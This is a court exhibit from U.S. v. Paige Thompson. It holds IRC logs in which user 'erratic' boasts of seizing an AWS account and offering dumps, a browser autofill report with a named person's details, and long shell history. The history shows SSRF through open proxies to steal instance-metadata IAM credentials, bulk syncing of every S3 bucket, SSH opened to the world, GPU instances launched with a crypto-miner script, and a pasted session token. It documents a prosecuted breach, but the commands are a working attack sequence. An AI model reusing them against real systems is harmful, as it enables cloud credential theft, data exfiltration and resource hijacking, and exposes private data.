IRC Chats from 1B52 - md126 ▶ .znc ▶ moddata ▶ log ▶ erratic ▶ freenode ▶ #netcrave				
der				
Name	Date modified	Туре	Size	
2019-05-06.log	5/6/2019 2:47 PM	Text Document	19 KB	
2019-05-07.log	5/7/2019 4:25 PM	Text Document	2 KB	
2019-05-08.log	5/8/2019 1:15 PM	Text Document	2 KB	
2019-05-09.log	5/9/2019 10:42 AM	Text Document	9 KB	
2019-05-10.log	5/10/2019 10:13 AM	Text Document	1 KB	
2019-05-11.log	5/11/2019 3:21 PM	Text Document	1 KB	
2019-05-12.log	5/11/2019 10:51 PM	Text Document	1 KB	
2019-05-13.log	5/13/2019 4:51 PM	Text Document	1 KB	
2019-05-14.log	5/14/2019 12:07 AM	Text Document	1 KB	
2019-05-15.log	5/15/2019 8:31 AM	Text Document	1 KB	
2019-05-16.log	5/16/2019 8:43 AM	Text Document	1 KB	
2019-05-18.log	5/18/2019 2:06 AM	Text Document	1 KB	
2019-05-20.log	5/20/2019 12:08 PM	Text Document	1 KB	
2019-05-21.log	5/20/2019 5:30 PM	Text Document	1 KB	
2019-05-23.log	5/23/2019 9:14 AM	Text Document	1 KB	
2019-05-24.log	5/24/2019 3:14 PM	Text Document	1 KB	
2019-05-25.log	5/25/2019 3:30 PM	Text Document	5 KB	
2019-05-27.log	5/27/2019 11:10 AM	Text Document	2 KB	
2019-05-28.log	5/28/2019 8:23 AM	Text Document	5 KB	
2019-05-29.log	5/29/2019 3:07 PM	Text Document	1 KB	
2019-05-30.log	5/30/2019 1:49 PM	Text Document	2 KB	
2019-05-31.log	5/31/2019 5:27 AM	Text Document	1 KB	
2019-06-01.log	5/31/2019 6:48 PM	Text Document	1 KB	
2019-06-02.log	6/2/2019 2:46 PM	Text Document	1 KB	
2019-06-03.log	6/3/2019 5:58 AM	Text Document	1 KB	
2019-06-04.log	6/4/2019 8:42 AM	Text Document	5 KB	
2019-06-05.log	6/5/2019 10:49 AM	Text Document	24 KB	
2019-06-06.log	6/6/2019 9:07 AM	Text Document	1 KB	
2019-06-07.log	6/6/2019 11:20 PM	Text Document	1 KB	

U.S. v. Paige Thompson CR19-159 RSL Plaintiff's Exhibit No. 455 Admitted_____

```
85 [07:27:49] <erratic> I'll prob fuck with it later, like I said last night, so much shit, so much not enough time.
86 [07:30:27] <erratic> I dunno my friend said something to me awhile back thats got me thinking about carding alot lately
87 [07:30:47] <erratic> Luhn algorithm shit
88 [07:31:01] <erratic> and other issuance characteristics
89 [07:37:30] <erratic> evidently he's got a mag track writer
90 [07:37:47] <erratic> and emboss kits
91 [07:37:57] <erratic> and a lot of other shit
92 [07:38:28] <erratic> a poor ass white girl like me need those
93 [07:38:33] <erratic> to go shopping
```

```
≥ 2019-06-05.log
 96 [07:53:40] <erratic> aws --profile astem iam create-login-profile --cli-input-ison file://create-login-profile.json
 97 [07:53:43] <erratic> {
 98 [07:53:46] <erratic> "LoginProfile": {
 99 [07:53:48] <erratic> "UserName": "default",
100 [07:53:51] <erratic> "CreateDate": "2019-06-05T07:52:15Z",
101
    [07:53:53] <erratic> "PasswordResetRequired": false
    [07:53:56] <erratic> }
102
103 [07:53:58] <erratic> }
104 [07:54:01] <erratic> aws sts get-caller-identity --profile astem
105 [07:54:03] <erratic> { "UserId": "AIDAU55F6ZVKSUXFH4SMH", "Account": 4197", "Arn":
     "arn:aws:iam:: 4197:user/default"
106 [07:54:06] <erratic> }
107 [07:54:09] <erratic> heh heh heh heh
108 [07:54:11] <erratic> gottem
109 [07:54:14] <erratic> smells like bacon
110 [07:54:28] <erratic> anyone want a domain?
111 [07:54:44] <erratic> how about a storage gateway :D
112 [07:59:27] <erratic> how about... a big fat db.r4.large dump
113 [07:59:51] <erratic> hugedumps.com
```

```
118 [10:01:52] <erratic> I think if we all worked together we could turn a substantial number of the internet's rogue bots into our
     own outlet that would finance our projects
119 [10:02:36] <erratic> I do it all the time
    [10:02:42] <erratic> just think of what we could do collectively
120
[10:03:34] <erratic> as long as we dont get much bigger of a group than we are now
122
    [10:04:25] <erratic> I'm pretty careless but I'm careless because nobody gives a fuck
123
    [10:04:33] <erratic> but I could stand to be less careless
    [10:05:09] <erratic> seriously like
124
    [10:05:13] <erratic> the shit I've done
125
126 [10:05:27] <erratic> way worse than what adrian lamp got arrested for initially
127 [10:05:41] <erratic> and that guy made his whole fucking career off being a scene whore
128 [10:05:53] <erratic> RIP adrian
```

≥ 2019-06-05.log



Extraction Report

Autofill (36)

Details		Delet
cardNumber: 12726229 Source: Chrome	Timestamp: 3/28/2019 2:58:42 AM(UTC-7)	
cardNumber: 12726229 Source: Chrome	Timestamp: 3/28/2019 2:58:42 AM(UTC-7)	
<u>username:</u> josephbaleda Source: Chrome	Timestamp: 3/28/2019 2:57:19 AM(UTC-7)	
_username: josephbaleda Source: Chrome	Timestamp: 3/28/2019 2:57:19 AM(UTC-7)	
username: josephbaleda Source: Chrome	Timestamp: 3/28/2019 2:56:45 AM(UTC-7)	
username: josephbaleda Source: Chrome	Timestamp: 3/28/2019 2:56:45 AM(UTC-7)	
username: joseph.baleda Source: Chrome	Timestamp: 3/28/2019 2:56:39 AM(UTC-7)	
username: joseph.baleda Source: Chrome	Timestamp: 3/28/2019 2:56:39 AM(UTC-7)	
answer: pizza Source: Chrome	Timestamp: 3/28/2019 2:56:12 AM(UTC-7)	
answer: pizza Source: Chrome	Timestamp: 3/28/2019 2:56:12 AM(UTC-7)	
username: joeybaleda Source: Chrome	Timestamp: 3/28/2019 2:56:12 AM(UTC-7)	
username: joeybaleda Source: Chrome	Timestamp: 3/28/2019 2:56:12 AM(UTC-7)	
dobDay: Source: Chrome	Timestamp: 3/28/2019 2:54:17 AM(UTC-7)	
dobDay: Source: Chrome	Timestamp: 3/28/2019 2:54:17 AM(UTC-7)	
mailingZipCodePrefix: 98109 Source: Chrome	Timestamp: 3/28/2019 2:54:17 AM(UTC-7)	
mailingZipCodePrefix: 98109 Source: Chrome	Timestamp: 3/28/2019 2:54:17 AM(UTC-7)	
dobYear: 1991 Source: Chrome	Timestamp: 3/28/2019 2:54:17 AM(UTC-7)	
dobYear: 1991 Source: Chrome	Timestamp: 3/28/2019 2:54:17 AM(UTC-7)	
middleName: A Source: Chrome	Timestamp: 3/28/2019 2:54:17 AM(UTC-7)	
middleName: A Source: Chrome	Timestamp: 3/28/2019 2:54:17 AM(UTC-7)	
emailAddress: josephbaleda@mailinator.com Source: Chrome	Timestamp: 3/28/2019 2:54:17 AM(UTC-7)	
emailAddress; josephbaleda@mailinator.com Source: Chrome	Timestamp: 3/28/2019 2:54:17 AM(UTC-7)	
nailingAddress.line2: Source: Chrome	Timestamp: 3/28/2019 2:54:17 AM(UTC-7)	
mailingAddress.line2: Source: Chrome	Timestamp: 3/28/2019 2:54:17 AM(UTC-7)	

lastName: Baleda Source: Chrome	9-RSL Document 373-13 Filed 09/27/22 APAGE 6 of 70
lastName: Baleda Source: Chrome	Timestamp: 3/28/2019 2:54:17 AM(UTC-7)
dobMonth: Source: Chrome	Timestamp: 3/28/2019 2:54:17 AM(UTC-7)
dobMonth: Source: Chrome	Timestamp: 3/28/2019 2:54:17 AM(UTC-7)
firstName: Joseph Source: Chrome	Timestamp: 3/28/2019 2:54:17 AM(UTC-7)
firstName: Joseph Source: Chrome	Timestamp: 3/28/2019 2:54:17 AM(UTC-7)
mailingAddress.line1: Source: Chrome	Timestamp: 3/28/2019 2:54:17 AM(UTC-7)
mailingAddress.line1: Source: Chrome	Timestamp: 3/28/2019 2:54:17 AM(UTC-7)
homePhoneNumberAreaCode: 425 Source: Chrome	Timestamp: 3/28/2019 2:54:17 AM(UTC-7)
homePhoneNumberSuffix: Source: Chrome	Timestamp: 3/28/2019 2:54:17 AM(UTC-7)
homePhoneNumberPrefix: Source: Chrome	Timestamp: 3/28/2019 2:54:17 AM(UTC-7)
mailingAddress.city: Seattle Source: Chrome	Timestamp: 3/28/2019 2:54:17 AM(UTC-7)

```
--region us-east-1 --instance-type p3.2xlarge --count 1
    5 aws ec2 run-instances --
--image-id ami-
                           f372 --key-name default --subnet-id subnet-95b60499
--associate-public-ip-address --security-group-ids
   26 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.41.122.83:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                         awssession.sh
   28 aws ec2 describe-instances --region eu-north-1
                                                                58fe --region eu-north-1
   29 aws ec2 terminate-instances --instance-ids i-
   30 aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 2 --image-id
ami- 1520 --key-name default --subnet-id subnet-f5b3b08d --associate-public-ip-address
--security-group-ids
   31 aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 2 --image-id
ami-
       1520 --key-name default --associate-public-ip-address --security-group-ids
   32 aws ec2 describe-security-groups --region eu-west2
   33 aws ec2 create-key-pair --key-name default --region eu-west-2
   39 aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 2 --image-id
                 6eab --key-name default --associate-public-ip-address --security-group-ids
ami
   40 aws ec∠ authorize-security-group-ingress --group-id
                                                                      --protocol tcp --port 22 --cidr
0.0.0.0/0 --region eu-west-2 --region eu-west-2
   41 ls /home/erratic/aws_scan/.ssh/
   47 aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 1 --image-id
                5eab --key-name default --associate-public-ip-address --security-group-ids
ami
   50 aws ec2 run-instances --region eu-west-2 --instance-type p3.2xlarge --count 1 --image-id
                 6eab --key-name default --associate-public-ip-address --security-group-ids
ami-
   51 aws ec2 describe-instances --region eu-west-2 |less
   53 aws ec2 describe-instances --region eu-west-2 | grep IPAddress
   54 aws ec2 describe-instances --region eu-west-2 | grep IpAddress
   78 aws ec2 terminate-instances --instance-id
                                                               9c66
                                                               ∍c66 --region us-west-2
   79 aws ec2 terminate-instances --instance-id
   80 aws ec2 describe-instances --region eu-west-2 | jq -r '.Reservations | .[] | .Instances | .[] |
.InstanceId' | parallel aws ec2 modify-instance-attribute --instance-id {}
--instance-initiated-shutdown-behavior terminate --region eu-west-2
   82 aws ec2 run-instances --region us-west-2 --instance-type c5n.large --count 1 --image-id
               0e791 --key-name default --associate-public-ip-address --security-group-ids
ami
               2544
 102 aws ec2 create-key-pair --region us-west-2 --key-name
 105 aws ec2 terminate-instances --instance-ids i-
                                                               f7e41
 106 aws ec2 terminate-instances --instance-ids i-
                                                               f7e41 --region us-west-2
 107 aws ec2 run-instances --region us-west-2 --instance-type c5n.large --count 1 --image-id
                e791 --key-name --associate-public-ip-address --security-group-ids sg-
                                                                                                      2544
ami-
```

U.S. v. Paige Thompson CR19-159 RSL Plaintiff's Exhibit No. 608 Admitted____

```
--instance-initiated-shutdown-behavior terminate
 161 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.198.107.105:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                               awssession.sh
 164 aws ec2 describe-instances --region us-east-1 describe-instances
 165 aws ec2 run-instances --region us-west-2 --instance-type t3.micro --count 1 --image-id
                ∂e791 --key-name --associate-public-ip-address --security-group-ids sg-
ami-
                                                                                                       2544
--instance-initiated-shutdown-behavior terminate
 166 aws ec2 run-instances --region us-west-2 --instance-type t3.micro --count 1 --image-id
ami-
               0e791 --key-name --associate-public-ip-address --security-group-ids sg- f0ae
--instance-initiated-shutdown-behavior terminate
 167 aws ec2 run-instances --region eu-west-2 --instance-type t3.micro --count 1 --image-id
               0e791 --associate-public-ip-address --security-group-ids sg-
ami-
--instance-initiated-shutdown-behavior terminate
 170 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.209.72.226:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh
 173 aws ec2 run-instances --region us-west-2 --instance-type t3.micro --count 1 --image-id
               0e791 --associate-public-ip-address --security-group-ids sg-
ami-
--instance-initiated-shutdown-behavior terminate
 174 aws ec2 run-instances --region us-west-2 --instance-type t3.micro --count 1 --image-id
ami-
               0e791 --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --subnet-id subnet-6ba95033
 175 aws ec2 run-instances --region us-west-2 --instance-type t3.micro --count 1 --image-id
                                                                               5fee
ami-
               0e791 --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --subnet-id subnet-ce2545b93
 178 aws ec2 run-instances --region us-west-2 --instance-type t3.micro --count 1 --image-id
               0e791 --associate-public-ip-address --security-group-ids sg-
ami-
--instance-initiated-shutdown-behavior terminate --subnet-id subnet-ce2545b9
 181 aws ec2 run-instances --region us-west-2 --instance-type t3.micro --count 1 --image-id
               0e791 --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate
 182 aws ec2 terminate-instances --region us-west-2 --instance-ids i-
                                                                                    c5d1
 190 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel mkdir -p identiphy/{} '&&' cd
identiphy/{} '\&\&' aws s3 sync s3://{} .
 191 aws ec2 run-instances --region us-west-2 --instance-type p3.8xlarge --count 2 --image-id
                e791 --associate-public-ip-address --security-group-ids sg-
ami-
--instance-initiated-shutdown-behavior terminate
 192 aws ec2 run-instances --region us-west-2 --instance-type p3.8xlarge --count 1 --image-id
ami-
               0e791 --associate-public-ip-address --security-group-ids sg-
```

```
--instance-initiated-shutdown-behavior terminate
 193 aws ec2 run-instances --region us-west-2 --instance-type p3.2xlarge --count 1 --image-id
               0e791 --associate-public-ip-address --security-group-ids sg
ami-
--instance-initiated-shutdown-behavior terminate
  195 aws ec2 authorize-security-group-ingress --group-id sg- 0db7 --protocol tcp --port 22 --cidr
0.0.0.0/0 --region us-west-2
  200 aws ec2 describe-instances --region us-west-2 --profile
                                                                     | ia -r '.Reservations | .[] |
.Instances | .[] | .InstanceId' | parallel aws ec2 terminate-instances --instance-ids {}
  201 aws ec2 describe-instances --region us-west-2 --profile
                                                                     | jq -r '.Reservations | .[] |
.Instances | .[] | .InstanceId'
  202 aws ec2 describe-instances --region us-west-2 | jq -r '.Reservations | .[] | .Instances | .[] |
.InstanceId'
  203 aws ec2 describe-instances --region us-west-2 --profile
                                                                     | jg -r '.Reservations | .[] |
.Instances | .[] | .InstanceId' | parallel aws ec2 terminate-instances --instance-ids {} --region us-west-2
  204 aws ec2 describe-instances --region us-west-2 --profile | jq -r '.Reservations | .[] | .Instances
.[] | .InstanceId' | parallel aws ec2 terminate-instances --instance-ids {} --region us-west-2
 205 aws ec2 describe-instances --region us-west-2 | jq -r '.Reservations | .[] | .Instances | .[] |
.InstanceId' | parallel aws ec2 terminate-instances --instance-ids {} --region us-west-2
  206 aws ec2 run-instances --region us-west-2 --instance-type p3.8xlarge --count 1 --image-id
ami-
               0e791 --associate-public-ip-address --security-group-ids sg- 0db7
--instance-initiated-shutdown-behavior terminate --key-name default
  207 aws ec2 run-instances --region us-west-2 --instance-type p3.2xlarge --count 1 --image-id
               0e791 --associate-public-ip-address --security-group-ids sg-
ami-
--instance-initiated-shutdown-behavior terminate --key-name default
 208 aws ec2 describe-instances --region us-west-2 --profile
                                                                     | jq -r '.Reservations | .[] |
.Instances | .[] | .PublicIpAddress'
  209 aws ec2 describe-instances --region us-west-2 | jg -r '.Reservations | .[] | .Instances | .[] |
[.PublicIpAddress, .InstanceType]'
  213 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://35.170.159.42:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                           | awssession.sh
  220 aws ec2 run-instances --region eu-west-2 --instance-type t3.micro --count 1 --image-id
                 6eab --associate-public-ip-address --security-group-ids sg-
ami.
--instance-initiated-shutdown-behavior terminate
  221 aws ec2 run-instances --region eu-west-2 --instance-type t3.micro --count 1 --image-id
ami-
                 5eab --associate-public-ip-address --security-group-ids sg-
--inscance-iniciated-shutdown-behavior terminate
  222 aws ec2 terminate-instances --instance-ids i-
                                                                e196 -- region eu-west-2
 224 aws ec2 run-instances --region eu-west-1 --instance-type p3.8xlarge --count 2 --image-id
                 6eab --associate-public-ip-address --security-group-ids sg-
ami-
```

```
--instance-initiated-shutdown-behavior terminate --key-name default
 225 aws ec2 run-instances --region eu-west-1 --instance-type p3.8xlarge --count 2 --image-id
                 1a80 --associate-public-ip-address --security-group-ids sg-
ami-
--instance-initiated-shutdown-behavior terminate --key-name default
  227 aws ec2 describe-instances --region us-west-1 | jq -r '.Reservations | .[] | .Instances | .[] |
[.PublicIpAddress, .InstanceType]'
  228 aws ec2 describe-instances --region eu-west-1 | jq -r '.Reservations | .[] | .Instances | .[] |
[.PublicIpAddress, .InstanceType]'
  229 aws ec2 authorize-security-group-ingress --group-id sg- 706e --protocol tcp --port 22 --cidr
0.0.0.0/0 --region eu-west-1
 235 aws sts-get-caller-identity
 236 aws ec2 describe-instances --region us-west-2 | jg -r '.Reservations | .[] | .Instances | .[] |
.PublicIpAddress'
 238 aws ec2 terminate-instances --region us-west-2 --isntance-ids i-
                                                                                   64a2
 239 aws ec2 terminate-instances --region us-west-2 --instance-ids i-
                                                                                   64a2
  240 aws ec2 run-instances --region us-west-2 --instance-type c5n.18xlarge --count 1 --image-id
                 ≥791 --key-name --associate-public-ip-address --security-group-ids sg-
                                                                                                      2544
ami-
--instance-initiated-shutdown-behavior terminate
 244 aws ec2 describe-instances --region us-west-2 | jq -r '.Reservations | .[] | .Instances | .[] '
 245 aws ec2 terminate-instances --region us-west-2 --instance-ids i-
                                                                                   9023
  246 aws ec2 terminate-instances help
  247 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://35.161.43.11:443
http://169.254.169.254/latest/meta-data/iam/security-credentials | awssession.sh
  250 aws ec2 run-instances --region eu-west-1 --instance-type p3.16xlarge --count 2 --image-id
                4a80 --associate-public-ip-address --security-group-ids sg- 706e
ami
--instance-initiated-shutdown-behavior terminate --key-name default
 259 aws ecs describe-container-instances
  260 aws ecs describe-clusters
 261 aws ecs list-services
 262 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy 18.232.116.219:8181
http://169.254.169.254/latest/meta-data/iam/security-credentials/
  266 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy 54.200.124.191:3129
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh
  268 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy 35.174.143.129:8181
http://169.254.169.254/latest/meta-data/security-credentials/
                                                                                            awssession.sh
 270 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy 35.174.143.129:8181
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh
```

```
283 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy 3.0.239.184:3128
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                  awssession.sh
 284 aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' |
                                                                                             /{} '&&' cd
         /{} '&&' aws s3 sync s3://{} .
 286 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy 54.200.150.203:8001
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                 | awssession.sh
 288 aws ecs list-tasks
 289 aws ecs describe-services
 291 aws ecs describe-container-instances --
 292 aws ecs describe-clusters --
 294 aws --profile
                                    describe-instances
  323 cp ../2018271FvR-
                                                    .zip .
  324 unzip 2018271FvR-
                                                    .zip
  325 less
                                        .json
                                    describe-instances --region us-west-2 | jq '.[]' | less
  350 aws --
                                    describe-instances --region us-west-2 | jq '' | less
  351 aws --
                                    describe-instances --region us-west-2 | jq -r '.Reservations.Instances
  352 aws --
| .[] | .InstanceType'
  353 aws --
                                    describe-instances --region us-west-2 | jq -r '.Reservations'
                                    describe-instances --region us-west-2 | jq -r '.Reservations' | less
  354 aws --
                                    describe-instances --region us-west-2 | jq -r '.Reservations | .[] |
  355 aws --
.Instances | .|| | .InstanceType'
                                   less
  356 aws --profile
                                          list-tables
  357 aws --profile
                                          list-tables --region us-west-2
                                    describe-db-clusters
  358 aws --profile
  359 aws --region us-west-2 --profile
                                                    rds describe-db-clusters
  360 aws --region us-west-2 --profile
                                                    s3api list-buckets
  361 aws --region us-west-2 --profile
                                                    s3api list-buckets | jq -r '.Buckets | .[] | .Name' |
                                                        /{} '&&' aws --region us-west-2 --profile
parallel
           s3 sync s3://{} .
  368 cd
aws scan/
                                                       5156/
                                                                               /tmp/
  391 aws --region us-west-2 --
  392 aws --region us-west-2 --
  393 aws --region us-west-2 --
  394 aws --region us-west-2 --
 395 aws --region us-west-2 --
  396 aws --region us-west-2 --
```

```
397 aws --region us-west-2 -
  398 aws --region us-west-2 -
  399 aws --region us-west-2 -
 400 aws --region us-west-2 -
  401 aws --region us-west-2 -
 402 aws --region us-west-2 -
  891 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.235.8.209:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                          | awssession.sh
  909 aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 2 --image-id
ami
                 4a80 --associate-public-ip-address --security-group-ids sg- 706e
--instance-initiated-shutdown-behavior terminate --user-data file://minersetup eth.sh
  910 aws ec2 run-instances --region eu-west-1 --instance-type p3.16xlarge --count 2 --image-id
                 4a80 --associate-public-ip-address --security-group-ids sg- 706e
--instance-initiated-shutdown-behavior terminate --user-data file://minersetup eth.sh
 911 aws ec2 describe-subnets --region eu-west-1
 912 aws ec2 describe-vpcs --region eu-west-1
 913 aws ec2 create-default-vpc --region eu-west-1
 914 aws ec2 describe-vpcs --region eu-west-2
  915 aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 1 --image-id
ami
                 6eab --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --user-data file://minersetup eth.sh
  919 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://63.34.213.125:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                     | awssession.sh
  922 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://63.34.213.125:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                         ∥ awsession.sh
  925 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.41.122.83:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                         awssession.sh
  927 aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 1 --image-id
ami
                 6eab --associate-public-ip-address --security-group-ids sg- 717f
--instance-initiated-shutdown-behavior terminate --user-data file://minersetup eth.sh
      aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 1 --image-id
ami-
               46eab --associate-public-ip-address --security-group-ids sg- 0917
--instance-initiated-shutdown-behavior terminate --user-data file://minersetup eth.sh --key-name default
  930 aws ec2 describe-security-groups --group-ids sg-
                                                          b917
  931 aws ec2 describe-security-groups --group-ids sg-
                                                          b917 --region eu-west-2
  941 aws ec2 modify-instance-attribute --instance-ids i-
                                                                     3b027 --user-data ""
  942 aws ec2 modify-instance-attribute --instance-id i
                                                                     ່ວ027 --user-data "" --region
eu-west-2
  943 aws ec2 modify-instance-attribute --instance-id i-
                                                                     3b027 --user-data="" --region
```

```
eu-west-2
  944 aws ec2 modify-instance-attribute --instance-id i-
                                                                      b027 --user-data file:///dev/null
--region eu-west-2
  945 aws ec2 modify-instance-attribute --instance-id i-
                                                                      b027 --user-data="[]" --region
eu-west-2
                                                                      b027 --user-data="{}" --region
  946 aws ec2 modify-instance-attribute --instance-id i-
eu-west-2
                                                                      b027 --user-data='{"value": ""}'
  947 aws ec2 modify-instance-attribute --instance-id i-
--region eu-west-2
  948 aws ec2 modify-instance-attribute --instance-id i-
                                                                      b027 --user-data='{"value": "none"}'
--region eu-west-2
  949 aws ec2 modify-instance-attribute --instance-id i-
                                                                      b027 --user-data='{"Value": ""}'
--region eu-west-2
  950 aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 1 --image-id
ami.
                 5eab --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --user-data --key-name default
  951 aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 1 --image-id
                 5eab --associate-public-ip-address --security-group-ids sg-
--instance-initiated-shutdown-behavior terminate --key-name default
  954 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxv https://54.245.71.151:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
| awssession.sh
  957 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://34.201.163.169:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                   | awssession.sh
  960 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://13.234.117.185:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
awssession.sh
  964 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.209.220.55:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                           awssession.sh
  968 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://34.234.188.25:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                               | awssession.sh
  971 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.208.62.195:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                             awssession.sh
  973 aws ec2 create-key-pair --region eu-west-2
  977 aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 1 --image-id
                 6eab --associate-public-ip-address --security-group-ids sg- cef5
ami-
--instance-initiated-shutdown-behavior terminate --key-name default --user-data file://minersetup eth.sh
 978 aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 1 --image-id
                 6eab --associate-public-ip-address --security-group-ids sg-
ami-
```

```
--instance-initiated-shutdown-behavior terminate --key-name default --user-data file://minersetup eth.sh
  981 aws ec2 authorize-security-group-ingress --group-id sg- cef5 --protocol tcp --port 22 --cidr
0.0.0.0/0 --region eu-west-1
  982 aws ec2 authorize-security-group-ingress --group-id sg-
                                                                 cef5 --protocol tcp --port 22 --cidr
0.0.0.0/0 --region eu-west-2
 988 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://35.170.159.42:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                 awsession.sh
 989 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://35.170.159.42:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                 awssession.sh
  992 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.214.49.137:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                               awssession.sh
  995 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.209.123.235:443
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                               \n
1000 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.77.46.101:443
                                                                               awssession.sh
http://169.254.169.254/latest/meta-data/iam/security-credentials/
1002 aws ec2 create-key-pair --region eu-west-2 --key-name default
1005 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://54.89.201.26:82
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                   l awssession.sh
1008 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://34.197.114.244:80
http://169.254.169.254/latest/meta-data/iam/security-credential
                                                                            l awssession.sh
1016 echo '{\n "Code" : "Success",\n "LastUpdated" : "2019-03-12T09:58:25Z",\n "Type" : "AWS-HMAC",\n
                                KCOE",\n "SecretAccessKey" :
"AccessKeyId" : "/
                                    B3k7",\n "Token":
"FOOGZXIvYXdzEAMaDAkUD+ZBFfycBzbRDCK3AzDUI5Xk6f5aL0KvC82nEkYEkZI2JNSAixZ79c3/LKpAq1djCXxSauj2AIJRNNIKnxd4U8
BVsPSqRD7jJujXXXrUp9tcwTy+Cm0SyrBAP4iqJZfDs1HKMi0ihzeCOdnulO55GWwcznlIlm+WR4orYAyJvRonvqiRjBKV7jBXrWxT0T7MN
6my8j1b0xoUHaQsdEOA3Q8Lic73F4HjADsF1hT7UO+90zRrRx8J6PycGt+II6aLu0cROAtF5+CDvkQCQUeoJuJDo2damT4BGiyptVHesC7K
x8IdDboXIcCH8I3VsCxmOavVjVrPLXB7OQMs1FE+gvME5CUPrAztLHC4CdsEvoQDpsrrwLpKzXLvEVu3QboGX1jwPZBEVkxSdoR0Zkf6Z1a
tudRzdE7rGvTPkloN/snzWdCejEPgC/vF7lM7ViiwgZ0/+62POTAQrooA32ioAWS/ZzqW/ekQhlTXKJbFWCCf17N/ZUakwsaefVb9c+DZk7
Ow4HkNmBfGkSNLdRGXUEbrd1tqPg3xEaqIoACvkB2p8VAhCD1v/16UfGwBtugc8zr0ccLUZ11dJ/tK38783Pu0mCgo4YWe5AU=",\n
"Expiration": "2019-03-12T16:07:07Z"\n}' | awssession.sh
1023 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://3.0.239.184:3128
http://169.254.169.254/latest/meta-data/iam/security-credentials/
                                                                                   awssession.sh
1059 mv
                            ./aws scan
1060 aws sts get-caller identity
      aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel mkdir -p
                                                                                                  /{} '&&'
1061
                  /{} '&&' aws s3 sync s3://{} .
cd
1062 cd aws sc
1064
      cat
                                                   .CSV
1065 cat
```

```
1085 cd
1086 mv
                      ./aws scan
1087 cd ../aws scan
1088 curl --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://34.197.114.244:80
http://169.254.169.254/latest/meta-data/iam/info | awssession.sh
